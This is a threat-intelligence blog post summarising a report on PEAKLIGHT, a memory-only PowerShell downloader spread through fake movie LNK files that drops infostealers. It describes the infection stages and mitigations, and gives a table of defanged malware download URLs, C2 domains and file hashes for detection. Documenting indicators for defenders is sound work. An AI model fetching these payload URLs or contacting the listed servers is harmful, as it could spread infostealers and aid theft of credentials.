Unveiling the Stealthy Memory-Only Malware Exploiting Content Delivery Networks
On August 22, 2024, Mandiant released a detailed report on a newly discovered memory-only malware dubbed "PEAKLIGHT." This sophisticated malware employs a complex, multi-stage infection process, leveraging content delivery networks (CDNs) to distribute malicious payloads.
Introduction
On August 22, 2024, Mandiant released a detailed report on a newly discovered memory-only malware dubbed "PEAKLIGHT." This sophisticated malware employs a complex, multi-stage infection process, leveraging content delivery networks (CDNs) to distribute malicious payloads. The malware is designed to evade traditional detection methods by operating entirely within memory, making it particularly dangerous and challenging to detect. PEAKLIGHT is part of a broader malware-as-a-service (MaaS) campaign delivering infostealers such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.
Report Overview
Mandiant's Managed Defense team identified PEAKLIGHT during investigations into anomalous network activity within a client environment. The malware was initially distributed via malicious Microsoft Shortcut Files (LNKs) embedded within ZIP archives, disguised as pirated movie files. These LNK files acted as the initial infection vector, leading to downloading a memory-only JavaScript dropper from a CDN. This dropper subsequently executed a PowerShell-based downloader, now known as PEAKLIGHT, to fetch additional payloads.
The infection process of PEAKLIGHT is highly intricate, consisting of several stages.
- Stage 1: Movie Lures - Users were tricked into downloading ZIP files containing LNK files, which, when executed, connected to a CDN hosting an obfuscated JavaScript dropper.
- Stage 2: JavaScript Dropper - This memory-only dropper executed a PowerShell script to download and run additional malware from remote servers.
- Stage 3: PEAKLIGHT Downloader - The PowerShell script downloaded files from a CDN and saved them to specific directories on the infected machine. PEAKLIGHT then executed these files, which included various infostealers.
- Stage 4: Final Payload - The downloaded files contained malware components such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT, designed to exfiltrate sensitive data from the compromised system.
The PEAKLIGHT malware poses a significant threat due to its ability to operate entirely in memory, bypassing traditional file-based detection mechanisms. Organizations infected with PEAKLIGHT are at risk of data theft, as the malware is designed to steal credentials, personal information, and other sensitive data. The use of CDNs to host the malware's payloads further complicates detection, as traffic to these networks is often considered legitimate.
Insights and Analysis
The use of memory-only techniques and trusted content delivery networks highlights cybercriminals' evolving tactics. To counter such threats, defenders must adopt advanced detection methods that monitor in-memory activity.
To mitigate the risk posed by PEAKLIGHT, organizations should implement advanced endpoint detection and response (EDR) solutions capable of monitoring in-memory activities. Regularly updating security software, conducting thorough network traffic analysis, and educating users about the dangers of downloading pirated content are critical steps in defending against this threat.
Indicators of Compromise (IOCs)
| Indicator | Type | Description |
|---|---|---|
hxxps://fatodex.b-cdn[.]net/fatodex | URL | Network-Based IOC associated with PEAKLIGHT downloader. |
hxxps://matodown.b-cdn[.]net/matodown | URL | Network-Based IOC associated with PEAKLIGHT downloader. |
hxxps://potexo.b-cdn[.]net/potexo | URL | Network-Based IOC associated with PEAKLIGHT downloader. |
relaxtionflouwerwi[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
deprivedrinkyfaiir[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
detailbaconroollyws[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
messtimetabledkolvk[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
considerrycurrentyws[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
understanndtytonyguw[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
patternapplauderw[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
horsedwollfedrwos[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
tropicalironexpressiw[.]shop | Domain | Command and control (C2) server used by LUMMAC.V2. |
hxxp://gceight8vt[.]top/upload.php | URL | CRYPTBOT C2 server URL. |
hxxps://brewdogebar[.]com/code.vue | URL | CRYPTBOT C2 server URL. |
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk | URL | SHADOWLADDER malware download URL. |
hxxps://fatodex.b-cdn[.]net/K1.zip | URL | SHADOWLADDER malware download URL. |
hxxps://fatodex.b-cdn[.]net/K2.zip | URL | SHADOWLADDER malware download URL. |
hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png | URL | SHADOWLADDER malware image download URL. |
hxxps://matodown.b-cdn[.]net/K1.zip | URL | SHADOWLADDER malware download URL. |
hxxps://matodown.b-cdn[.]net/K2.zip | URL | SHADOWLADDER malware download URL. |
hxxps://nextomax.b-cdn[.]net/L1.zip | URL | SHADOWLADDER malware download URL. |
hxxps://nextomax.b-cdn[.]net/L2.zip | URL | SHADOWLADDER malware download URL. |
hxxps://potexo.b-cdn[.]net/K1.zip | URL | SHADOWLADDER malware download URL. |
hxxps://potexo.b-cdn[.]net/K2.zip | URL | SHADOWLADDER malware download URL. |
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c) | File Hash (MD5) | File associated with CRYPTBOT malware. |
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3) | File Hash (MD5) | Archive containing malware associated with CRYPTBOT. |
Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693) | File Hash (MD5) | Executable identified as a variant of CRYPTBOT infostealer. |
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4) | File Hash (MD5) | File associated with LUMMAC.V2 infostealer. |
WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538) | File Hash (MD5) | Malicious DLL used by LUMMAC.V2 infostealer. |
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67) | File Hash (MD5) | File associated with PEAKLIGHT downloader. |
Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3) | File Hash (MD5) | File associated with PEAKLIGHT downloader. |
Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016) | File Hash (MD5) | Executable associated with SHADOWLADDER malware. |
bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e) | File Hash (MD5) | Configuration file associated with SHADOWLADDER malware. |
cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca) | File Hash (MD5) | ISO file linked to SHADOWLADDER malware. |
K1.zip (MD5: b6b8164feca728db02e6b636162a2960) | File Hash (MD5) | Archive containing malware associated with SHADOWLADDER. |
K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1) | File Hash (MD5) | Archive containing malware associated with SHADOWLADDER. |
K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a) | File Hash (MD5) | Archive containing malware associated with SHADOWLADDER. |
K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530) | File Hash (MD5) | Archive containing malware associated with SHADOWLADDER. |
L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8) | File Hash (MD5) | Archive containing malware associated with SHADOWLADDER. |
LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14) | File Hash (MD5) | Malicious DLL used by SHADOWLADDER malware. |
toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd) | File Hash (MD5) | Configuration file associated with SHADOWLADDER malware. |
WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe) | File Hash (MD5) | Malicious DLL associated with SHADOWLADDER malware. |
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell is used to execute the PEAKLIGHT downloader script. |
| Execution | System Binary Proxy Execution: Mshta | T1218.005 | Mshta.exe is used to bypass application control and execute malicious code. |
| Defense Evasion | Obfuscated Files or Information | T1027 | PEAKLIGHT uses obfuscated JavaScript and PowerShell to evade detection. |
| Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005 | LNK files masquerade as legitimate movie files to deceive users. |
| Command and Control | Exfiltration Over C2 Channel | T1041 | Stolen data is exfiltrated through HTTP/S connections to C2 servers. |
References
Comments ()